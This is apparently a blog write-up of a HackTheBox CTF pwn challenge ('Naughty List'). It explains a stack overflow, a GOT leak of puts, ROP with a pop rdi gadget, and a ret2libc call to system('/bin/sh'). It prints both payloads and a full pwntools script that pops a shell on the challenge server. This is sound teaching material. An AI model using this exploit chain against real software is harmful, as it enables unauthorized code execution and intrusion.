Learnings on Binary Exploitation (1): ret2libc

Last week, I solved some challenges in the Cyber Santa is Coming To Town CTF by HackTheBox. There, I spent some time on the pwn (binary exploitation) challenges and learned some new approaches that I’d like to share here.

Challenge

We are looking at the Naughty List challenge. We receive two files: naughty_list and libc.so.6. Running the binary and entering some data gives the following output (in the terminal every letter is colored differently, but I'd like to spare you that):

$ ./naughty_list

~ Ho Ho Ho Santa is here ~

       _______________
    0==( Naughty List (c==0
       '______________'|
         | Name        |
         | Gift        |
       __)_____________|
   0==(               (c==0
       '--------------'

[*] Enter your name    (letters only): Richard
[*] Enter your surname (letters only): Wohlbold
[*] Enter your age (18-120): 19

[+] Name:    [RICHARD]
[+] Surname: [WOHLBOLD]
[+] Age:     [19]

[*] Name of the gift you want and why you were good enough to deserve it: gift

[*] 🎅 will take a better look and hopefuly you will get your 🎁!

Next, we open the binary in Ghidra and find an interesting function called get_descr.

Its decompiled code shows that read can write far more bytes than the buffer holds: the buffer can only store 32 bytes, while read happily writes almost 1000. Having located the memory error, a stack buffer overflow, we next need to find a way to exploit it.
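The payloads in this post use 40 bytes of padding before the first overwritten address. A common way to measure that distance is to send a cyclic (de Bruijn) pattern and check which part of it lands in the return address. pwntools provides this as cyclic() and cyclic_find(). Below is a minimal, dependency-free sketch of the same idea. It is not necessarily how the offset was found for this challenge, and the names pattern and find_offset are made up for illustration.

```python
# Dependency-free sketch of the idea behind pwntools' cyclic()/cyclic_find():
# a de Bruijn sequence over lowercase letters in which every 4-byte window
# occurs only once, so any 4 bytes of it reveal their own offset.
import string
from functools import lru_cache


@lru_cache(maxsize=None)
def de_bruijn(alphabet: str, n: int) -> str:
    """Sequence in which every length-n string over `alphabet` occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)
    sequence = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                sequence.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in sequence)


def pattern(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the pattern, to be sent as input."""
    return de_bruijn(string.ascii_lowercase, n)[:length].encode()


def find_offset(chunk: bytes, n: int = 4) -> int:
    """Position of `chunk` in the pattern; its first n bytes identify it."""
    return de_bruijn(string.ascii_lowercase, n).encode().index(chunk[:n])
```

In gdb, you would send pattern(200) as the gift description. When get_descr's ret faults on the bogus address, pass the 8 bytes at rsp to find_offset. If the 32-byte buffer is directly followed by the 8-byte saved frame pointer, the result should be 40.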

We now inspect the security mechanisms of the binary:

$ pwn checksec ./naughty_list
[*] '/share/htb/pwn_naughty_list/naughty_list'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

This means that we cannot execute injected code on the stack (NX enabled). However, we do not have to worry about stack canaries, and the binary's own addresses are not randomized (no PIE). Therefore, instead of injecting shellcode, we have to jump to code that already exists.

The binary itself contains no function that would give us a shell, so we have to call a function from the C standard library instead. Therefore, we also inspect the security of the provided libc.so.6:

$ pwn checksec ./libc.so.6    
[*] '/share/htb/pwn_minimelfistic/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

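PIE is enabled for libc, which is expected for a shared library. It is position-independent, and with ASLR it is loaded at a different base address on every run. This makes calling a C standard library function harder, because we first need to find out where the library is located in memory.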

Linker internals

When a binary is dynamically linked against libc, it does not contain the code of the libc functions it uses. Instead, it contains small stubs for them in its procedure linkage table (PLT). These stubs jump to the address stored in the corresponding entry of the Global Offset Table (GOT). With lazy binding, a function's address is resolved on its first call and then written into the GOT. Since this binary has Full RELRO, all entries are resolved at load time instead, and the GOT is then made read-only. Either way, while the program runs, the GOT holds real libc addresses. Therefore, if we can manage to read part of the GOT, we obtain an address inside libc. Because we have libc.so.6 as a file, we know the offset of that symbol inside the library. Subtracting this offset from the leaked address gives us the base address of the library. After that, we can calculate the address of every function inside the library.
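To make the arithmetic concrete, here is a small sketch using numbers from the run at the end of this post. There, the leaked puts address is 0x7fe2cf0e6aa0 and the computed base is 0x7fe2cf066000, so puts sits at offset 0x80aa0 in that libc. The offset used for system is a made-up placeholder. In the real exploit, pwntools supplies the offsets through libc.symbols.

```python
# Numbers from the run at the end of this post; SYSTEM_OFFSET is a
# hypothetical placeholder, not the real offset of system in libc.so.6.
LEAKED_PUTS = 0x7fe2cf0e6aa0   # runtime address of puts, read from the GOT
PUTS_OFFSET = 0x80aa0          # offset of puts in that libc (leak - base in the log)
SYSTEM_OFFSET = 0x4f000        # hypothetical offset of system

PAGE_SIZE = 0x1000


def libc_base(leaked: int, offset: int) -> int:
    """Base address = leaked runtime address - offset of the symbol in the file."""
    base = leaked - offset
    # The library is mapped at a page boundary, so a base with non-zero low
    # 12 bits means the leak or the offset is wrong (e.g. a different libc).
    if base % PAGE_SIZE:
        raise ValueError(f"base {base:#x} is not page-aligned")
    return base


def runtime_address(base: int, offset: int) -> int:
    """Runtime address of any other symbol: base + its offset in the file."""
    return base + offset


base = libc_base(LEAKED_PUTS, PUTS_OFFSET)
print(hex(base))                                   # 0x7fe2cf066000
print(hex(runtime_address(base, SYSTEM_OFFSET)))   # 0x7fe2cf0b5000 (placeholder offset)
```

The page-alignment check is a cheap sanity test. If the provided libc.so.6 did not match the server's libc, the offsets would be wrong and the base would almost certainly not end in 000.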

Reading the GOT

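At this point, we do not know where libc is. To read an address out of the Global Offset Table, we can therefore only use code whose addresses we already know: the binary itself and its PLT stubs. The binary's own functions are of no use here, so we need a standard library function that has a stub in the PLT. We list the binary's symbols; the imported standard library symbols are the ones with a @@GLIBC version suffix: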

$ nm -gj ./naughty_list 
alarm@@GLIBC_2.2.5
banner
__bss_start
check
color
color_arr
__data_start
data_start
display
_dl_relocate_static_pie
__dso_handle
_edata
_end
_fini
fwrite@@GLIBC_2.2.5
get_age
get_descr
get_name
get_surname
__gmon_start__
_init
_IO_stdin_used
__isoc99_scanf@@GLIBC_2.7
__libc_csu_fini
__libc_csu_init
__libc_start_main@@GLIBC_2.2.5
main
memset@@GLIBC_2.2.5
p
printf@@GLIBC_2.2.5
puts@@GLIBC_2.2.5
rainbow
rand@@GLIBC_2.2.5
read@@GLIBC_2.2.5
reset
setup
setvbuf@@GLIBC_2.2.5
srand@@GLIBC_2.2.5
_start
stdin@@GLIBC_2.2.5
stdout@@GLIBC_2.2.5
strcmp@@GLIBC_2.2.5
strlen@@GLIBC_2.2.5
time@@GLIBC_2.2.5
__TMC_END__
toupper@@GLIBC_2.2.5
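A small sketch that filters the imports out of such a listing is shown below. It assumes, as in the listing, that imported symbols carry a @@GLIBC_ version suffix while the binary's own symbols have none. The result also contains data objects such as stdin and stdout, which cannot be called through the PLT.

```python
def libc_imports(nm_output: str) -> list:
    """Names of symbols the binary imports from glibc, in listing order.

    Assumption: imported symbols carry a version suffix such as
    "@@GLIBC_2.2.5"; the binary's own symbols (main, get_descr, ...) do not.
    """
    imports = []
    for line in nm_output.splitlines():
        name, sep, version = line.strip().partition("@")
        if sep and version.lstrip("@").startswith("GLIBC_"):
            imports.append(name)
    return imports


listing = """alarm@@GLIBC_2.2.5
banner
get_descr
puts@@GLIBC_2.2.5
stdin@@GLIBC_2.2.5"""
print(libc_imports(listing))  # ['alarm', 'puts', 'stdin']
```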

One of these functions is puts. Its man page (man 3 puts) shows the following signature:

int puts(const char *s);

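puts prints the bytes at s up to the first null byte, followed by a newline. If we pass it the address of a GOT entry, it therefore prints the raw libc address stored there. We are on 64-bit Linux, which follows the System V AMD64 ABI. Under this ABI, the first integer or pointer argument is passed in rdi (followed by rsi, rdx, rcx, r8 and r9). So before calling puts, we need to put the address we want to print, here the GOT entry of puts, into rdi.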

But how do we put the desired value into rdi? This is where so-called Return-Oriented Programming comes in.

Filling the register

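Return-Oriented Programming (ROP) reuses short instruction sequences that already exist in the program and end with a ret instruction, typically the last few instructions of a function. Since ret pops an address off the stack and jumps to it, we can chain such sequences together.

This is done by overwriting the stack with return addresses interleaved with data. Each ret jumps to the next address, and pop instructions load the data in between into the desired registers.

Such a useful instruction sequence is called a gadget. We can list a binary's gadgets by running $ ROPgadget --binary ./naughty_list, which gives us the line 0x0000000000401443 : pop rdi ; ret. To print a GOT entry with puts, we therefore overwrite the return address of get_descr with three values: the address of this gadget, then the GOT address of puts (which pop rdi loads into rdi), then the address of puts in the PLT (where the gadget's ret jumps to).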
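To see how such a chain executes, here is a toy simulation of the stack during the leak. Only the gadget address 0x401443 comes from this post. PUTS_GOT, PUTS_PLT and GET_DESCR are hypothetical placeholders for elf.got['puts'], elf.symbols['puts'] and elf.symbols['get_descr']. The model ignores everything except the stack slots consumed by pop and ret.

```python
# Toy model of a ROP chain. Only POP_RDI_RET is taken from this post; the
# other addresses are hypothetical placeholders.
POP_RDI_RET = 0x401443
PUTS_GOT = 0x403fc8      # hypothetical: elf.got['puts']
PUTS_PLT = 0x401030      # hypothetical: elf.symbols['puts']
GET_DESCR = 0x401200     # hypothetical: elf.symbols['get_descr']


def run_chain(chain: list) -> list:
    """Simulate execution from get_descr's final ret.

    `chain` holds the qwords starting at the overwritten return address.
    Returns (function, rdi) pairs in the order the functions are reached.
    """
    rsp = 0          # index into chain (one slot = 8 bytes on the real stack)
    rdi = None
    trace = []

    def pop() -> int:
        nonlocal rsp
        value = chain[rsp]
        rsp += 1
        return value

    rip = pop()                          # get_descr's ret jumps to chain[0]
    while True:
        if rip == POP_RDI_RET:
            rdi = pop()                  # pop rdi
            rip = pop()                  # ret
        elif rip == PUTS_PLT:
            trace.append(("puts", rdi))  # puts(rdi) prints the GOT entry
            rdi = None                   # rdi is caller-saved: puts may clobber it
            rip = pop()                  # puts' own ret uses the next slot
        elif rip == GET_DESCR:
            trace.append(("get_descr", rdi))
            return trace                 # the overflow can be triggered again
        else:
            raise ValueError(f"jumped to unknown address {rip:#x}")


print(run_chain([POP_RDI_RET, PUTS_GOT, PUTS_PLT, GET_DESCR]))
```

The key point is the last branch for puts. Because we enter puts with ret instead of call, nothing pushes a return address for it, so the slot right after it in the chain becomes the place puts returns to.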

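After puts, we would like to jump back to get_descr so we can exploit the buffer overflow again, this time knowing where libc is located. Since puts returns by popping the next address off the stack, we place the address of get_descr right after the address of puts. The 40 bytes of padding fill the 32-byte buffer and the 8 bytes after it (the saved frame pointer), so the next 8 bytes overwrite the return address. Thus, we use the following payload (pwntools):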

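payload = b"A" * 40                        # padding up to the return address
payload += p64(0x401443)                   # pop rdi; ret
payload += p64(elf.got['puts'])            # popped into rdi: the GOT entry of puts
payload += p64(elf.symbols['puts'])        # puts(GOT entry) via the PLT
payload += p64(elf.symbols['get_descr'])   # puts returns here: overflow again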
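For readers without pwntools at hand, the sketch below builds the same payload layout with Python's struct module and prints which value lands at which offset from the start of the buffer. p64 here is a local stand-in for pwntools' function of the same name. The GOT, PLT and get_descr addresses are hypothetical placeholders, and the 32 + 8 split of the padding is an assumption about the stack frame.

```python
import struct

# Hypothetical addresses: only the gadget comes from this post; the rest are
# placeholders for elf.got['puts'], elf.symbols['puts'], elf.symbols['get_descr'].
POP_RDI_RET = 0x401443
PUTS_GOT = 0x403fc8
PUTS_PLT = 0x401030
GET_DESCR = 0x401200

BUFFER_SIZE = 32                   # size of the local buffer, as seen in Ghidra
SAVED_RBP = 8                      # assumption: the saved frame pointer follows it
PADDING = BUFFER_SIZE + SAVED_RBP  # 40: offset of the return address


def p64(value: int) -> bytes:
    """Little-endian 64-bit packing, like pwntools' p64."""
    return struct.pack("<Q", value)


def build_payload(padding: int, chain: list) -> bytes:
    """Filler bytes up to the return address, then one qword per chain entry."""
    return b"A" * padding + b"".join(p64(q) for q in chain)


def layout(payload: bytes, padding: int) -> list:
    """(offset, qword) pairs for everything from the return address onwards."""
    return [
        (off, struct.unpack("<Q", payload[off:off + 8])[0])
        for off in range(padding, len(payload), 8)
    ]


payload = build_payload(PADDING, [POP_RDI_RET, PUTS_GOT, PUTS_PLT, GET_DESCR])
for off, qword in layout(payload, PADDING):
    print(f"buffer+{off:#04x}: {qword:#018x}")
```

Because read copies raw bytes and does not stop at null bytes, the zero bytes in the upper half of each packed address are harmless here. An input function that stops at whitespace, such as scanf with %s, would be much pickier about the payload.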

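puts then prints the address of puts inside libc. With the provided libc.so.6, we calculate the base address with libc.address = leaked_addr - libc.symbols['puts']. Before libc.address is set, libc.symbols['puts'] is just the offset of puts inside the file. Once it is set, pwntools returns runtime addresses for all symbols. The resulting base addresses are aligned to page boundaries (the lowest 12 bits are zero), for example 0x7f7d7f79e000, which makes us confident that the leak works.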
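The script turns the leaked line into an integer with int.from_bytes. The sketch below adds a sanity check for a subtle failure mode of this kind of leak. puts stops at the first null byte, and recvline stops at the first 0x0a byte, so an address containing either byte arrives truncated. The function name parse_puts_leak is made up for illustration.

```python
def parse_puts_leak(line: bytes) -> int:
    """Convert the line printed by puts(<GOT entry>) back into an address."""
    raw = line[:-1] if line.endswith(b"\n") else line  # drop the newline puts adds
    # libc is usually mapped at 0x00007fxxxxxxxxxx: the two top bytes are zero,
    # so puts stops after 6 bytes. A shorter line means an address byte was
    # 0x00 (puts stopped early) or 0x0a (recvline split the line there).
    if len(raw) != 6:
        raise ValueError(f"unexpected leak length {len(raw)}, try again")
    return int.from_bytes(raw, "little")


# What puts prints for a GOT entry holding 0x7fe2cf0e6aa0 (the value from the run):
printed = (0x7fe2cf0e6aa0).to_bytes(8, "little").split(b"\x00")[0] + b"\n"
print(hex(parse_puts_leak(printed)))  # 0x7fe2cf0e6aa0
```

Raising instead of silently continuing turns a rare bad leak into an obvious retry, rather than a confusing crash in the second stage.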

Now, we can calculate the address of system inside of libc. This function also takes one parameter:

int system(const char *command);

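Therefore, we fill rdi with a pointer to the string /bin/sh\x00, which can be found inside libc. At this point, I ran into a problem: I was randomly getting an EOF from the server. After googling for some time, I found out that this was caused by a misaligned stack in the call to system. The System V ABI requires rsp to be 16-byte aligned at a call instruction, and system in many glibc versions uses SSE instructions such as movaps that crash on a misaligned stack. Adding a gadget that just returns (ret) shifts the stack by 8 bytes and restores the alignment. The final payload looks like this: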

payload = b"A" * 40                                 # padding up to the return address
payload += p64(0x401443)                            # pop rdi; ret
payload += p64(next(libc.search(b'/bin/sh\x00')))   # rdi = "/bin/sh"
payload += p64(0x400756)                            # ret (realigns the stack)
payload += p64(libc.symbols['system'])              # system("/bin/sh")
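Why does a single ret fix the crash? Each pop or ret consumes one 8-byte slot, so we can compute rsp at the moment system starts and compare it with what the ABI expects at function entry (rsp % 16 == 8, because call pushes an 8-byte return address onto a 16-byte aligned stack). The sketch below does that. CHAIN_START is a hypothetical address. The sketch also assumes that get_descr was entered with a correctly aligned stack, so the slot holding its return address is 8 mod 16, like any normal return address.

```python
# Hypothetical address of chain[0] (the overwritten return address of
# get_descr); assumed to be 8 mod 16, like any slot a call pushed into.
CHAIN_START = 0x7ffc3a5e1d28


def entry_rsp(chain_start: int, index: int) -> int:
    """rsp at the moment the code at chain[index] starts running.

    Every slot up to and including chain[index] has been consumed by exactly
    one 8-byte pop or ret, which holds for chains built from pop/ret gadgets.
    """
    return chain_start + 8 * (index + 1)


def is_aligned_for_call(rsp_at_entry: int) -> bool:
    """System V ABI: rsp is 16-byte aligned at the call instruction, so after
    the return address has been pushed, rsp % 16 == 8 at function entry."""
    return rsp_at_entry % 16 == 8


# [pop rdi; ret, "/bin/sh", system]       -> system is chain[2]
print(is_aligned_for_call(entry_rsp(CHAIN_START, 2)))  # False
# [pop rdi; ret, "/bin/sh", ret, system]  -> system is chain[3]
print(is_aligned_for_call(entry_rsp(CHAIN_START, 3)))  # True
```

Under this assumption, the extra ret moves system from an even to an odd slot, which is exactly the 8-byte shift the ABI needs.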

Running the script

We run the script and get the flag:

$ python3 solve.py
[*] '/share/htb/pwn_naughty_list/naughty_list'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/share/htb/pwn_naughty_list/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 178.62.5.61 on port 30661: Done
leaked puts 0x7fe2cf0e6aa0
leaked base 0x7fe2cf066000
[*] Switching to interactive mode
 
[*] 🎅 will take a better look and hopefuly you will get your 🎁!
$ ls
flag.txt  libc.so.6  naughty_list
$ cat flag.txt
HTB{u_w1ll_b3_n4ughtyf13d_1f_u_4r3_g3tt1ng_4_g1ft}
$ 
[*] Closed connection to 178.62.5.61 port 30661

The final script:

from pwn import *

local = True  # True: debug locally under gdb, False: attack the remote server

elf = ELF('./naughty_list')
context.binary = elf
if local:
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  # the system's own libc
    p = gdb.debug('./naughty_list')
else:
    libc = ELF('./libc.so.6')  # the libc provided with the challenge
    p = remote('178.62.5.61', 30661)

# Answer the name, surname and age prompts with valid input
p.recvuntil(b':')
p.recvuntil(b' ')
p.sendline(b'sh')
p.recvuntil(b':')
p.recvuntil(b' ')
p.sendline(b'abc')
p.recvuntil(b':')
p.recvuntil(b' ')
p.sendline(b'20')
# Skip the summary (Name:, Surname:, Age:) and wait for the gift prompt
p.recvuntil(b':')
p.recvuntil(b':')
p.recvuntil(b':')
p.recvuntil(b':')
p.recvuntil(b' ')

# Stage 1: leak the libc address of puts, then return to get_descr
payload = b"A" * 40
payload += p64(0x401443) # pop rdi; ret
payload += p64(elf.got['puts'])
payload += p64(elf.symbols['puts'])
payload += p64(elf.symbols['get_descr'])
p.sendline(payload)
p.recvline()
p.recvline()
b = p.recvline()  # raw bytes of the GOT entry, as printed by puts
leaked_puts = int.from_bytes(b.rstrip(b'\n'), byteorder='little')
print("leaked puts", hex(leaked_puts))
libc.address = leaked_puts - libc.symbols['puts']  # rebases all libc symbols
print("leaked base", hex(libc.address))
p.recvuntil(b':')  # wait for get_descr's prompt again

# Stage 2: call system("/bin/sh"), with an extra ret to realign the stack
payload = b"A" * 40
payload += p64(0x401443) # pop rdi; ret
payload += p64(next(libc.search(b'/bin/sh\x00')))
payload += p64(0x400756) # ret
payload += p64(libc.symbols['system'])
p.sendline(payload)
p.interactive()